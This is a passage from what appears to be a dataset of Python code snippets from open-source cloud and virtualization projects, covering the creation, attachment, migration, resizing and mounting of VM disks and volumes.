constants.RDM:\n logger.info(f\"LSO Deployment type: {constants.RDM}\")\n vsphere_base.add_rdm_disks()\n\n if lso_type == constants.VMDK:\n logger.info(f\"LSO Deployment type: {constants.VMDK}\")\n vsphere_base.attach_disk(\n config.ENV_DATA.get(\"device_size\", defaults.DEVICE_SIZE),\n config.DEPLOYMENT.get(\"provision_type\", constants.VM_DISK_TYPE),\n )\n\n if lso_type == constants.DIRECTPATH:\n logger.info(f\"LSO Deployment type: {constants.DIRECTPATH}\")\n vsphere_base.add_pci_devices()\n\n # wipe partition table on newly added PCI devices\n compute_nodes = get_compute_node_names()\n for compute_node in compute_nodes:\n wipe_all_disk_partitions_for_node(compute_node)", "def attach(**_):\n\n volume_id = \\\n utils.get_external_resource_id_or_raise(\n 'attach volume', ctx.source.instance)\n instance_id = \\\n utils.get_external_resource_id_or_raise(\n 'attach volume', ctx.target.instance)\n\n if ctx.source.node.properties[constants.ZONE] not in \\\n ctx.target.instance.runtime_properties.get('placement'):\n ctx.logger.info(\n 'Volume Zone {0} and Instance Zone {1} do not match. '\n 'This may lead to an error.'.format(\n ctx.source.node.properties[constants.ZONE],\n ctx.target.instance.runtime_properties.get('placement')\n )\n )\n\n if _attach_external_volume_or_instance(instance_id):\n return\n\n volume_object = _get_volumes_from_id(volume_id)\n\n if not volume_object:\n raise NonRecoverableError(\n 'EBS volume {0} not found in account.'.format(volume_id))\n\n if constants.VOLUME_CREATING in volume_object.update():\n return ctx.operation.retry(\n message='Waiting for volume to be ready. '\n 'Volume in state {0}'\n .format(volume_object.status))\n elif constants.VOLUME_AVAILABLE not in volume_object.update():\n raise NonRecoverableError(\n 'Cannot attach Volume {0} because it is in state {1}.'\n .format(volume_object.id, volume_object.status))\n\n ctx.logger.debug(\n 'Attempting to attach volume {0} to instance {1}.'\n .format(volume_id, instance_id))\n\n try:\n volume_object.attach(\n instance_id,\n ctx.source.node.properties['device'])\n except (boto.exception.EC2ResponseError,\n boto.exception.BotoServerError) as e:\n raise NonRecoverableError('{0}'.format(str(e)))\n\n ctx.source.instance.runtime_properties['instance_id'] = \\\n instance_id\n ctx.logger.info(\n 'Attached EBS volume {0} with instance {1}.'\n .format(volume_id, instance_id))", "def migrate(self, **kwargs):\n volume_name = kwargs['NAME']\n vm = kwargs['vm']\n volume_info = self.cm.find_name(name=volume_name)\n volume_attached_vm = volume_info[0]['AttachedToVm']\n vm_info = Shell.run(f\"multipass info {vm} --format=json\")\n vm_info = json.loads(vm_info)\n vm_status = vm_info[\"info\"][vm]['state']\n if vm_status == 'running':\n param = {'NAME': volume_name}\n self.detach(**param)\n self.attach(**param, vm=vm)\n try:\n for old_vm in volume_attached_vm:\n volume_info[0]['AttachedToVm'].remove(old_vm)\n except:\n pass\n volume_info[0]['AttachedToVm'].append(vm)\n return volume_info", "def _start_guestfs(self):\n if self.guestfs is None:\n self.guestfs = guestfs.GuestFS()\n self.guestfs.add_drive_opts(self.disks[0], format='qcow2', readonly=0)\n self.guestfs.launch()\n\n partition = self.settings['partition']\n if isinstance(partition, int):\n partition_list = self.guestfs.list_partitions()\n partition_name = partition_list[partition]\n else:\n partition_name = partition\n self.guestfs.mount_options(\"\", partition_name, \"/\")", "def GrowInstanceDisk(self, instance, disk, amount, wait_for_sync=None,\n reason=None):\n body = {\n \"amount\": amount,\n }\n\n _SetItemIf(body, wait_for_sync is not None, \"wait_for_sync\", wait_for_sync)\n\n query = []\n _AppendReason(query, reason)\n\n return self._SendRequest(HTTP_POST,\n (\"/%s/instances/%s/disk/%s/grow\" %\n (GANETI_RAPI_VERSION, instance, disk)),\n query, body)", "def launch_vm(vm_id, vm_metadata):\n print('\\nCreating disk and vm with ID:', vm_id)\n vm_metadata['vm_id'] = vm_id\n ram_mbs, num_cpus, num_gpus = required_resources_for_method(\n vm_metadata['method'],\n bool(vm_metadata['pretrained_r_nets_path']))\n\n create_disk_cmd = (\n 'gcloud compute disks create '\n '\"{disk_name}\" --zone \"{zone}\" --source-snapshot \"{source_snapshot}\" '\n '--type \"pd-standard\" --project=\"{gcloud_project}\" '\n '--size=200GB'.format(\n disk_name=vm_id,\n zone=ZONE,\n source_snapshot=SOURCE_SNAPSHOT,\n gcloud_project=GCLOUD_PROJECT,\n ))\n print('Calling', create_disk_cmd)\n # Don't fail if disk already exists.\n subprocess.call(create_disk_cmd, shell=True)\n\n create_instance_cmd = (\n 'gcloud compute --project={gcloud_project} instances create '\n '{instance_name} --zone={zone} --machine-type={machine_type} '\n '--subnet=default --network-tier=PREMIUM --maintenance-policy=TERMINATE '\n '--service-account={service_account} '\n '--scopes=storage-full,compute-rw '\n '--accelerator=type=nvidia-tesla-p100,count={gpu_count} '\n '--disk=name={disk_name},device-name={disk_name},mode=rw,boot=yes,'\n 'auto-delete=yes --restart-on-failure '\n '--metadata-from-file startup-script=./scripts/vm_drop_root.sh '\n '--metadata {vm_metadata} --async'.format(\n instance_name=vm_id,\n zone=ZONE,\n machine_type='custom-{num_cpus}-{ram_mbs}'.format(\n num_cpus=num_cpus, ram_mbs=ram_mbs),\n gpu_count=num_gpus,\n disk_name=vm_id,\n vm_metadata=(\n ','.join('{}={}'.format(k, v) for k, v in vm_metadata.items())),\n gcloud_project=GCLOUD_PROJECT,\n service_account=SERVICE_ACCOUNT,\n ))\n\n print('Calling', create_instance_cmd)\n subprocess.check_call(create_instance_cmd, shell=True)", "def add_vdisk(client, resource_group_name, vm_name, controller=\"1000\",\n independence_mode=\"persistent\", size=16777216):\n from .vendored_sdks.models import VirtualDisk\n\n virtual_machine = client.get(resource_group_name, vm_name)\n disk = VirtualDisk(controller_id=controller,\n independence_mode=independence_mode,\n total_size=size)\n\n virtual_machine.disks.append(disk)\n return client.create_or_update(resource_group_name, vm_name, virtual_machine)", "def create_disk_instance(device, disk_params):\n\n domain_name = device[\"name\"]\n disk_instance_path = \"\"\n\n if \"type\" in disk_params:\n if disk_params[\"type\"] == \"image\" and \"image_id\" in disk_params:\n logger.debug(\"Creating secondary/tertiary Disk information\")\n image_id = disk_params[\"image_id\"]\n disk_image = Image.objects.get(pk=image_id)\n disk_base_path = settings.MEDIA_ROOT + \"/\" + disk_image.filePath.url\n\n disk_instance_path = osUtils.get_instance_path_from_image(disk_base_path,\n domain_name + \"_secondary_image.img\"\n )\n\n if not osUtils.check_path(disk_instance_path):\n if not osUtils.create_thin_provision_instance(disk_base_path,\n domain_name + \"_secondary_image.img\"\n ):\n raise Exception(\"Could not create image instance for image: \" + disk_base_path)\n\n elif disk_params[\"type\"] == \"blank\":\n disk_instance_path = settings.MEDIA_ROOT \\\n + \"/user_images/instances/\" + domain_name + \"_secondary_blank.img\"\n\n disk_size = \"16G\"\n if \"size\" in disk_params:\n disk_size = disk_params[\"size\"]\n\n if not osUtils.check_path(disk_instance_path):\n if not osUtils.create_blank_image(disk_instance_path, disk_size):\n raise Exception(\"Could not create image instance for image: \" + disk_instance_path)\n\n elif disk_params[\"type\"] == \"config_drive\":\n # let's check if config_drive is supported for this vm_type!\n # this is usually used for vMX in openstack, however, we can also use it here for KVM deployments\n disk_instance_path = ''\n if \"configDriveSupport\" in device and device[\"configDriveSupport\"] is True:\n\n logger.debug(\"Lets create a config-drive!\")\n\n # keep a dict of files with format: filename: filecontents\n files = dict()\n params = device[\"configDriveParams\"]\n if \"configDriveParamsFile\" in device and device[\"configDriveParamsFile\"]:\n logger.debug(\"Using inline config_drive format\")\n # behavior change 12-28-2016 - allow passing a list of templates and destinations\n # instead of defining the params directly on the device object\n # if the configDriveParams is a dict, then this is an older topology, leave this code here\n # to still support them - otherwise fall through to the isinstance check for list type for\n # newer style configuration\n if isinstance(params, dict):\n name = device[\"configDriveParamsFile\"]\n file_data = \"\"\n # config drive params are usually a dict - to make json serialization easier\n # for our purposes here, let's just make a file with a single key: value per line\n # note, we can add a serialization format to the vm_type.js if needed here\n # only currently used for /boot/loader.conf in vmx and riot\n for k in params:\n file_data += '%s=\"%s\"\\n' % (k, params[k])\n\n files[name] = file_data\n\n # junos customization\n # let's also inject a default config here as well if possible!\n if \"junos\" in device[\"type\"]:\n logger.debug(\"Creating Junos configuration template\")\n junos_config = osUtils.get_junos_default_config_template(device[\"name\"],\n device[\"label\"],\n device[\"password\"],\n device[\"ip\"],\n device[\"managementInterface\"])\n\n if junos_config is not None:\n files[\"/juniper.conf\"] = junos_config\n\n # check for new (12-28-2016) style config drive params definition\n if isinstance(params, list):\n logger.debug(\"params is a list\")\n for p in params:\n if \"template\" in p and \"destination\" in p:\n file_data = None\n file_data = osUtils.compile_config_drive_params_template(\n p[\"template\"],\n device[\"name\"],\n device[\"label\"],\n device[\"password\"],\n device[\"ip\"],\n device[\"managementInterface\"]\n )\n if file_data is not None:\n files[p[\"destination\"]] = file_data\n\n disk_instance_path = osUtils.create_config_drive(device[\"name\"], files)\n if disk_instance_path is None:\n disk_instance_path = ''\n\n logger.debug(\"Using %s\" % disk_instance_path)\n return disk_instance_path", "def attach_volume(self,\n context,\n connection_info,\n instance,\n mountpoint,\n disk_bus=None,\n device_type=None,\n encryption=None):\n\n def _check_available_lun(data_disks):\n # We can attach upto 16 data disks to an instance\n luns = [i.lun for i in data_disks]\n for i in range(1, 16):\n if i not in luns:\n return i\n raise Exception(\"Could not attach volume\")\n\n volume_data = connection_info['data']\n azure_name = self._get_omni_name_from_instance(instance)\n azure_instance = utils.get_instance(\n self.compute_client, drv_conf.resource_group, azure_name)\n data_disks = azure_instance.storage_profile.data_disks\n lun = _check_available_lun(data_disks)\n name = volume_data['name']\n id = volume_data['id']\n data_disk = {\n 'name': name,\n 'create_option': 'attach',\n 'lun': lun,\n 'managed_disk': {\n 'id': id\n }\n }\n data_disks.append(data_disk)\n utils.create_or_update_instance(self.compute_client,\n drv_conf.resource_group, azure_name,\n azure_instance)\n LOG.info(\"Attached volume %s to instance %s\" % (name, instance.uuid))", "def push(self):\n # setup vars\n compute_config = self.config_['compute']\n dt_now = dt.datetime.now()\n if not self.update_data_disks_:\n self.compute_update_data_disks()\n\n # authorize access to GCE api\n auth_http = instance.oauth_authorization(self.config_)\n gce_helper = gce.Gce(auth_http, self.config_, project_id=compute_config['project'])\n\n for zone, disk, update_disk in zip(compute_config['zones'], compute_config['data_disks'], self.update_data_disks_):\n # check for update disk existence\n disk_response = gce_helper.get_disk(update_disk, zone)\n if not disk_response:\n logging.error('Update disk %s does not exist' %(update_disk))\n continue\n\n # generate backup disk filename\n backup_disk = '%s-backup-%s-%s-%s-%sh-%sm-%ss' %(disk, dt_now.month, dt_now.day, dt_now.year, dt_now.hour, dt_now.minute, dt_now.second) \n\n # snapshot the updated data disks\n snapshot_response = gce_helper.snapshot_disk(update_disk, compute_config['project'], zone)\n\n # delete previous disk and replace, if not in use\n disk_response = gce_helper.get_disk(disk, zone)\n if disk_response:\n if USERS_KEY not in disk_response.keys() or (USERS_KEY in disk_response.keys() and len(disk_response[USERS_KEY]) == 0):\n # create new disk from snapshot\n gce_helper.delete_disk(disk)\n gce_helper.create_disk(disk, zone=zone, size_gb=compute_config['disk_size_gb'],\n source_snapshot=snapshot_response['snapshot_name'])\n\n # delete update disk (don't delete if push can't be done now, otherwise changes won't be overwritten)\n gce_helper.delete_disk(update_disk)\n\n elif USERS_KEY in disk_response.keys() and len(disk_response[USERS_KEY]) > 0:\n # stage the push for a future time\n logging.info('Master disk in use. Staging backup disk for a future push')\n push_queue_filename = os.path.join(self.cache_dir_, PUSH_QUEUE_FILE)\n f = open(push_queue_filename, 'a')\n f.write(backup_disk + '\\n')\n else:\n logging.warning('Master disk was not found') \n\n # create backup disk from snapshot\n gce_helper.create_disk(backup_disk, zone=zone, size_gb=compute_config['disk_size_gb'],\n source_snapshot=snapshot_response['snapshot_name'])\n\n # delete the snapshot\n ss_del_response = gce_helper.delete_snapshot(snapshot_name=snapshot_response['snapshot_name'], project=compute_config['project'])\n return True", "def extend_volume(self, volume, new_size):\n LOG.info('Extending volume: %(id)s New size: %(size)s GB',\n {'id': volume['id'], 'size': new_size})\n nfs_share = volume['provider_location']\n nms = self.share2nms[nfs_share]\n volume_path = self.remote_path(volume)\n if getattr(self.configuration,\n self.driver_prefix + '_sparsed_volumes'):\n self._create_sparsed_file(nms, volume_path, new_size)\n else:\n block_size_mb = 1\n block_count = ((new_size - volume['size']) * units.Gi /\n (block_size_mb * units.Mi))\n\n nms.appliance.execute(\n 'dd if=/dev/zero seek=%(seek)d of=%(path)s'\n ' bs=%(bs)dM count=%(count)d' % {\n 'seek': volume['size'] * units.Gi / block_size_mb,\n 'path': volume_path,\n 'bs': block_size_mb,\n 'count': block_count\n }\n )", "def _unlock_singlepass_encrypted_disk_fallback(source_vm, resource_group_name, repair_vm_name, repair_group_name, copy_disk_name, is_linux):\n\n # Installs the extension on repair VM and mounts the disk after unlocking.\n encryption_type, key_vault, kekurl, secreturl = _fetch_encryption_settings(source_vm)\n if is_linux:\n volume_type = 'DATA'\n else:\n volume_type = 'ALL'\n\n try:\n if encryption_type is Encryption.SINGLE_WITH_KEK:\n install_ade_extension_command = 'az vm encryption enable --disk-encryption-keyvault {vault} --name {repair} --resource-group {g} --key-encryption-key {kek_url} --volume-type {volume}' \\\n .format(g=repair_group_name, repair=repair_vm_name, vault=key_vault, kek_url=kekurl, volume=volume_type)\n elif encryption_type is Encryption.SINGLE_WITHOUT_KEK:\n install_ade_extension_command = 'az vm encryption enable --disk-encryption-keyvault {vault} --name {repair} --resource-group {g} --volume-type {volume}' \\\n .format(g=repair_group_name, repair=repair_vm_name, vault=key_vault, volume=volume_type)\n # Add format-all flag for linux vms\n if is_linux:\n install_ade_extension_command += \" --encrypt-format-all\"\n logger.info('Unlocking attached copied disk...')\n _call_az_command(install_ade_extension_command)\n # Linux VM encryption extension has a bug and we need to manually unlock and mount its disk\n if is_linux:\n # Validating secret tag and setting original tag if it got changed\n _secret_tag_check(resource_group_name, copy_disk_name, secreturl)\n logger.debug(\"Manually unlocking and mounting disk for Linux VMs.\")\n _unlock_mount_linux_encrypted_disk(repair_vm_name, repair_group_name)\n except AzCommandError as azCommandError:\n error_message = str(azCommandError)\n # Linux VM encryption extension bug where it fails and then continue to mount disk manually\n if is_linux and \"Failed to encrypt data volumes with error\" in error_message:\n logger.debug(\"Expected bug for linux VMs. Ignoring error.\")\n # Validating secret tag and setting original tag if it got changed\n _secret_tag_check(resource_group_name, copy_disk_name, secreturl)\n _unlock_mount_linux_encrypted_disk(repair_vm_name, repair_group_name)\n else:\n raise", "def add_partitions(self, disk):\n for partition in self.partitions:\n if 'Extended' in partition.get_type():\n with open(disk, 'rb') as hd:\n hd.seek(partition.read_start)\n new_mbr = Mbr(hd.read(512), lba_offset=partition.lba)\n self.partitions.extend(new_mbr.partitions)\n\n new_mbr.add_partitions(disk)", "def pull_disk(self, disk, update_fields=None):\n import_time = timezone.now()\n imported_disk = self.import_disk(\n disk.vm.backend_id, disk.backend_id, save=False\n )\n\n disk.refresh_from_db()\n if disk.modified < import_time:\n if not update_fields:\n update_fields = models.Disk.get_backend_fields()\n\n update_pulled_fields(disk, imported_disk, update_fields)", "def setup_device(device):\n try:\n # Gets around \"Resource busy\" errors\n device.detach_kernel_driver(0)\n except Exception:\n pass\n device.set_configuration()", "def swap_volume(self, old_connection_info, new_connection_info,\n instance, mountpoint, resize_to):", "def migrate_volume(self, ctxt, volume_id, host, force_host_copy=False):\n return", "def attach_volume(self, server, volume, device=None, tag=None):\n attach_kwargs = dict(volumeId=volume['id'])\n if device:\n attach_kwargs['device'] = device\n if tag:\n attach_kwargs['tag'] = tag\n\n attachment = self.servers_client.attach_volume(\n server['id'], **attach_kwargs)['volumeAttachment']\n # On teardown detach the volume and for multiattach volumes wait for\n # the attachment to be removed. For non-multiattach volumes wait for\n # the state of the volume to change to available. This is so we don't\n # error out when trying to delete the volume during teardown.\n if volume['multiattach']:\n att = waiters.wait_for_volume_attachment_create(\n self.volumes_client, volume['id'], server['id'])\n self.addCleanup(waiters.wait_for_volume_attachment_remove,\n self.volumes_client, volume['id'],\n att['attachment_id'])\n else:\n self.addCleanup(waiters.wait_for_volume_resource_status,\n self.volumes_client, volume['id'], 'available')\n waiters.wait_for_volume_resource_status(self.volumes_client,\n volume['id'], 'in-use')\n # Ignore 404s on detach in case the server is deleted or the volume\n # is already detached.\n self.addCleanup(self._detach_volume, server, volume)\n return attachment", "def mount(self, fstype, export, vol_name, mountpoint, instance, options):\n\n # NOTE(mdbooth): mount() may currently be called multiple times for a\n # single attachment. Any operation which calls\n # LibvirtDriver._hard_reboot will re-attach volumes which are probably\n # already attached, resulting in multiple mount calls.\n\n LOG.debug('_HostMountState.mount(fstype=%(fstype)s, '\n 'export=%(export)s, vol_name=%(vol_name)s, %(mountpoint)s, '\n 'options=%(options)s) generation %(gen)s',\n {'fstype': fstype, 'export': export, 'vol_name': vol_name,\n 'mountpoint': mountpoint, 'options': options,\n 'gen': self.generation}, instance=instance)\n with self._get_locked(mountpoint) as mount:\n if os.path.ismount(mountpoint):\n LOG.debug(('Mounting %(mountpoint)s generation %(gen)s, '\n 'mountpoint already mounted'),\n {'mountpoint': mountpoint, 'gen': self.generation},\n instance=instance)\n else:\n LOG.debug('Mounting %(mountpoint)s generation %(gen)s',\n {'mountpoint': mountpoint, 'gen': self.generation},\n instance=instance)\n\n fileutils.ensure_tree(mountpoint)\n\n try:\n nova.privsep.fs.mount(fstype, export, mountpoint, options)\n except processutils.ProcessExecutionError:\n # Check to see if mountpoint is mounted despite the error\n # eg it was already mounted\n if os.path.ismount(mountpoint):\n # We're not going to raise the exception because we're\n # in the desired state anyway. However, this is still\n # unusual so we'll log it.\n LOG.exception(\n 'Error mounting %(fstypes export %(export)s on '\n '%(mountpoint)s. Continuing because mountpount is '\n 'mounted despite this.',\n {'fstype': fstype, 'export': export,\n 'mountpoint': mountpoint}, instance=instance)\n else:\n # If the mount failed there's no reason for us to keep\n # a record of it. It will be created again if the\n # caller retries.\n\n # Delete while holding lock\n del self.mountpoints[mountpoint]\n\n raise\n\n mount.add_attachment(vol_name, instance.uuid)\n\n LOG.debug('_HostMountState.mount() for %(mountpoint)s '\n 'generation %(gen)s completed successfully',\n {'mountpoint': mountpoint, 'gen': self.generation},\n instance=instance)", "def createDisk(instanceID, devicePrefix, raidDevice, numVolumes, volumeSize,\n mountPath, namePrefix):\n assert numVolumes > 0\n assert 0 < volumeSize < 1000\n if numVolumes > 1:\n assert raidDevice is not None\n\n print 'Getting instance information.'\n ec2 = EC2Connection()\n instance = ec2.get_all_instances([instanceID])[0].instances[0]\n zone = instance.placement\n\n volumes = []\n for i in range(numVolumes):\n device = devicePrefix + str(i + 1)\n print 'Creating volume for', device\n volume = ec2.create_volume(volumeSize, zone)\n volume.attach(instanceID, device)\n volumes.append(volume)\n if namePrefix is not None:\n volume.add_tag(\n 'Name', '{0} ({1})'.format(namePrefix, device.split('/')[-1]))\n\n pendingVolumes = set(volumes)\n while pendingVolumes:\n print 'Attaching volumes.', len(pendingVolumes), 'remaining.'\n time.sleep(1)\n for volume in list(pendingVolumes):\n try:\n volume.update()\n except EC2ResponseError:\n print 'Response error.'\n print \"Don't panic, this usually happens, trying again.\"\n if volume.attachment_state() == u'attached':\n pendingVolumes.remove(volume)\n\n print 'All volumes attached: ', ''.join(volume.id for volume in volumes)\n\n env.host_string = instance.dns_name\n\n if len(volumes) > 1:\n sudo('DEBIAN_FRONTEND=noninteractive apt-get install -y mdadm')\n print 'Creating RAID array.'\n devices = [volume.attach_data.device.replace('/dev/sd', '/dev/xvd')\n for volume in volumes]\n devices = ' '.join(devices)\n sudo('mdadm --create {0} --level raid10 --auto=yes --assume-clean '\n '--raid-devices {1} {2}'.format(raidDevice, numVolumes, devices))\n sudo('echo DEVICE {0} >> /etc/mdadm/mdadm.conf'.format(devices))\n sudo('mdadm --detail --scan | grep {0} | '\n 'sudo tee -a /etc/mdadm/mdadm.conf'.format(raidDevice))\n\n # Tell the kernel to use the specified configurationg, otherwise it\n # will use something like /dev/md127\n sudo('update-initramfs -u')\n\n device = raidDevice\n else:\n device = volumes[0].attach_data.device.replace('/dev/sd', '/dev/xvd')\n\n print 'Formating device.'\n sudo('mkfs.ext4 {0}'.format(device))\n sudo('echo \"{0} {1} ext4 noatime 0 0\" >> /etc/fstab'.format(device,\n mountPath))\n\n print 'Mounting device.'\n sudo('mkdir -p {0}'.format(mountPath))\n sudo('mount %s' % mountPath)\n print 'Success.'", "def prepare_disks_with_fs_for_vm(storage_domain, vm_name, executor=None):\n disk_ids = list()\n mount_points = list()\n disk_names = []\n disk_interfaces = []\n logger.info('Creating disks for test')\n disks = start_creating_disks_for_test(sd_name=storage_domain)\n for disk in disks:\n disk_names.append(disk['disk_name'])\n disk_interfaces.append(disk['disk_interface'])\n disk_ids.append(ll_disks.get_disk_obj(disk['disk_name']).get_id())\n\n assert ll_disks.wait_for_disks_status(\n disk_names, timeout=CREATION_DISKS_TIMEOUT\n ), \"Some disks are still locked\"\n logger.info(\"Attaching and activating disks %s\", disk_names)\n prepare_disks_for_vm(vm_name, disk_names, interfaces=disk_interfaces)\n\n if ll_vms.get_vm_state(vm_name) == config.VM_DOWN:\n ll_vms.startVm(\n True, vm_name, wait_for_status=config.VM_UP, wait_for_ip=True\n )\n if not executor:\n executor = get_vm_executor(vm_name)\n logger.info(\"Creating filesystems on disks %s\", disks)\n\n with ThreadPoolExecutor(max_workers=len(disk_names)) as thread_executor:\n for disk_alias in disk_names:\n result = thread_executor.submit(\n create_fs_on_disk, vm_name=vm_name, disk_alias=disk_alias,\n executor=executor\n )\n ecode = result.result()[0]\n mount_point = result.result()[1]\n if not ecode:\n logger.error(\n \"Cannot create filesysem on disk %s:\", disk_alias\n )\n mount_point = ''\n mount_points.append(mount_point)\n logger.info(\n \"Mount points for new disks: %s\", mount_points\n )\n return disk_ids, mount_points", "def setDiskStoragePath(self, path):\n self.disk_storage_path = path", "def set_vm_storage_profile(vm, profile):\n\n spec = vim.vm.ConfigSpec()\n profile_specs = []\n profile_spec = vim.vm.DefinedProfileSpec()\n profile_spec.profileId = profile.profileId.uniqueId\n profile_specs.append(profile_spec)\n spec.vmProfile = profile_specs\n vm.ReconfigVM_Task(spec)", "def attach_volume(self, server, volume, device=None, tag=None,\n wait_for_detach=True):\n attach_kwargs = dict(volumeId=volume['id'])\n if device:\n attach_kwargs['device'] = device\n if tag:\n attach_kwargs['tag'] = tag\n\n attachment = self.servers_client.attach_volume(\n server['id'], **attach_kwargs)['volumeAttachment']\n\n # NOTE(lyarwood): During attach we initially wait for the volume\n # attachment and then check the volume state.\n waiters.wait_for_volume_attachment_create(\n self.volumes_client, volume['id'], server['id'])\n # TODO(lyarwood): Remove the following volume status checks and move to\n # attachment status checks across all volumes now with the 3.27\n # microversion somehow.\n if not volume['multiattach']:\n waiters.wait_for_volume_resource_status(\n self.volumes_client, volume['id'], 'in-use')\n\n # NOTE(lyarwood): On teardown (LIFO) initially wait for the volume\n # attachment in Nova to be removed. While this technically happens last\n # we want this to be the first waiter as if it fails we can then dump\n # the contents of the console log. The final check of the volume state\n # should be a no-op by this point and is just added for completeness\n # when detaching non-multiattach volumes.\n if not volume['multiattach'] and wait_for_detach:\n self.addCleanup(\n waiters.wait_for_volume_resource_status, self.volumes_client,\n volume['id'], 'available')\n self.addCleanup(\n waiters.wait_for_volume_attachment_remove_from_server,\n self.servers_client, server['id'], volume['id'])\n self.addCleanup(self._detach_volume, server, volume)\n\n return attachment", "def mount(fstype, export, vol_name, mountpoint, instance, options=None):\n with __manager__.get_state() as mount_state:\n mount_state.mount(fstype, export, vol_name, mountpoint, instance,\n options)", "def _DetachDisk(self, idx, root, _):\n hotmsg = \"\"\n if self.op.hotplug:\n hotmsg = self._HotplugDevice(constants.HOTPLUG_ACTION_REMOVE,\n constants.HOTPLUG_TARGET_DISK,\n root, None, idx)\n\n # Always shutdown the disk before detaching.\n ShutdownInstanceDisks(self, self.instance, [root])\n\n # Rename detached disk.\n #\n # Transform logical_id from:\n # <file_storage_dir>/<instance_name>/<disk_name>\n # to\n # <file_storage_dir>/<disk_name>\n if root.dev_type in (constants.DT_FILE, constants.DT_SHARED_FILE):\n file_driver = root.logical_id[0]\n instance_path, disk_name = os.path.split(root.logical_id[1])\n new_path = os.path.join(os.path.dirname(instance_path), disk_name)\n new_logical_id = (file_driver, new_path)\n result = self.rpc.call_blockdev_rename(self.instance.primary_node,\n [(root, new_logical_id)])\n result.Raise(\"Failed before detach\")\n # Update logical_id\n self.cfg.SetDiskLogicalID(root.uuid, new_logical_id)\n\n # Remove disk from config\n self.cfg.DetachInstanceDisk(self.instance.uuid, root.uuid)\n\n # re-read the instance from the configuration\n self.instance = self.cfg.GetInstanceInfo(self.instance.uuid)\n\n return hotmsg", "def manual_driving(self):\n\n self.start_driving()", "def physical_disks(self, physical_disks):\n\n self._physical_disks = physical_disks", "def _ConvertInstanceDisks(self, feedback_fn):\n template_info = self.op.disk_template\n if self.op.disk_template == constants.DT_EXT:\n template_info = \":\".join([self.op.disk_template,\n self.op.ext_params[\"provider\"]])\n\n old_template = self.cfg.GetInstanceDiskTemplate(self.instance.uuid)\n feedback_fn(\"Converting disk template from '%s' to '%s'\" %\n (old_template, template_info))\n\n assert not (old_template in constants.DTS_NOT_CONVERTIBLE_FROM or\n self.op.disk_template in constants.DTS_NOT_CONVERTIBLE_TO), \\\n (\"Unsupported disk template conversion from '%s' to '%s'\" %\n (old_template, self.op.disk_template))\n\n pnode_uuid = self.instance.primary_node\n snode_uuid = []\n if self.op.remote_node_uuid:\n snode_uuid = [self.op.remote_node_uuid]\n\n old_disks = self.cfg.GetInstanceDisks(self.instance.uuid)\n\n feedback_fn(\"Generating new '%s' disk template...\" % template_info)\n file_storage_dir = CalculateFileStorageDir(\n self.op.disk_template, self.cfg, self.instance.name,\n file_storage_dir=self.op.file_storage_dir)\n new_disks = GenerateDiskTemplate(self,\n self.op.disk_template,\n self.instance.uuid,\n pnode_uuid,\n snode_uuid,\n self.disks_info,\n file_storage_dir,\n self.op.file_driver,\n 0,\n feedback_fn,\n self.diskparams)\n\n # Create the new block devices for the instance.\n feedback_fn(\"Creating new empty disks of type '%s'...\" % template_info)\n try:\n CreateDisks(self, self.instance, disk_template=self.op.disk_template,\n disks=new_disks)\n except errors.OpExecError:\n self.LogWarning(\"Device creation failed\")\n for disk in new_disks:\n self.cfg.ReleaseDRBDMinors(disk.uuid)\n raise\n\n # Transfer the data from the old to the newly created disks of the instance.\n feedback_fn(\"Populating the new empty disks of type '%s'...\" %\n template_info)\n for idx, (old, new) in enumerate(zip(old_disks, new_disks)):\n feedback_fn(\" - copying data from disk %s (%s), size %s\" %\n (idx, old.dev_type,\n utils.FormatUnit(new.size, \"h\")))\n if old.dev_type == constants.DT_DRBD8:\n old = old.children[0]\n result = self.rpc.call_blockdev_convert(pnode_uuid, (old, self.instance),\n (new, self.instance))\n msg = result.fail_msg\n if msg:\n # A disk failed to copy. Abort the conversion operation and rollback\n # the modifications to the previous state. The instance will remain\n # intact.\n if self.op.disk_template == constants.DT_DRBD8:\n new = new.children[0]\n self.Log(\" - ERROR: Could not copy disk '%s' to '%s'\" %\n (old.logical_id[1], new.logical_id[1]))\n try:\n self.LogInfo(\"Some disks failed to copy\")\n self.LogInfo(\"The instance will not be affected, aborting operation\")\n self.LogInfo(\"Removing newly created disks of type '%s'...\" %\n template_info)\n RemoveDisks(self, self.instance, disks=new_disks)\n self.LogInfo(\"Newly created disks removed successfully\")\n finally:\n for disk in new_disks:\n self.cfg.ReleaseDRBDMinors(disk.uuid)\n result.Raise(\"Error while converting the instance's template\")\n\n # In case of DRBD disk, return its port to the pool\n for disk in old_disks:\n if disk.dev_type == constants.DT_DRBD8:\n tcp_port = disk.logical_id[2]\n self.cfg.AddTcpUdpPort(tcp_port)\n\n # Remove old disks from the instance.\n feedback_fn(\"Detaching old disks (%s) from the instance and removing\"\n \" them from cluster config\" % old_template)\n for old_disk in old_disks:\n self.cfg.RemoveInstanceDisk(self.instance.uuid, old_disk.uuid)\n\n # Attach the new disks to the instance.\n feedback_fn(\"Adding new disks (%s) to cluster config and attaching\"\n \" them to the instance\" % template_info)\n for (idx, new_disk) in enumerate(new_disks):\n self.cfg.AddInstanceDisk(self.instance.uuid, new_disk, idx=idx)\n\n # Re-read the instance from the configuration.\n self.instance = self.cfg.GetInstanceInfo(self.instance.uuid)\n\n # Release node locks while waiting for sync and disks removal.\n ReleaseLocks(self, locking.LEVEL_NODE)\n\n disk_abort = not WaitForSync(self, self.instance,\n oneshot=not self.op.wait_for_sync)\n if disk_abort:\n raise errors.OpExecError(\"There are some degraded disks for\"\n \" this instance, please cleanup manually\")\n\n feedback_fn(\"Removing old block devices of type '%s'...\" % old_template)\n RemoveDisks(self, self.instance, disks=old_disks)\n\n # Node resource locks will be released by the caller.", "def detachDisk(positive, alias, vmName):\n logger.info(\"Detaching disk %s from vm %s\", alias, vmName)\n disk_attachment = get_disk_attachment(vmName, alias, attr='name')\n return DISK_ATTACHMENTS_API.delete(disk_attachment, positive)", "def attach_volume(self, context, volume_id, instance_uuid, host_name,\n mountpoint, mode):\n @utils.synchronized(volume_id, external=True)\n def do_attach():\n # check the volume status before attaching\n volume = self.db.volume_get(context, volume_id)\n volume_metadata = self.db.volume_admin_metadata_get(\n context.elevated(), volume_id)\n if volume['status'] == 'attaching':\n if (volume['instance_uuid'] and volume['instance_uuid'] !=\n instance_uuid):\n msg = _(\"being attached by another instance\")\n raise exception.InvalidVolume(reason=msg)\n if (volume['attached_host'] and volume['attached_host'] !=\n host_name):\n msg = _(\"being attached by another host\")\n raise exception.InvalidVolume(reason=msg)\n if (volume_metadata.get('attached_mode') and\n volume_metadata.get('attached_mode') != mode):\n msg = _(\"being attached by 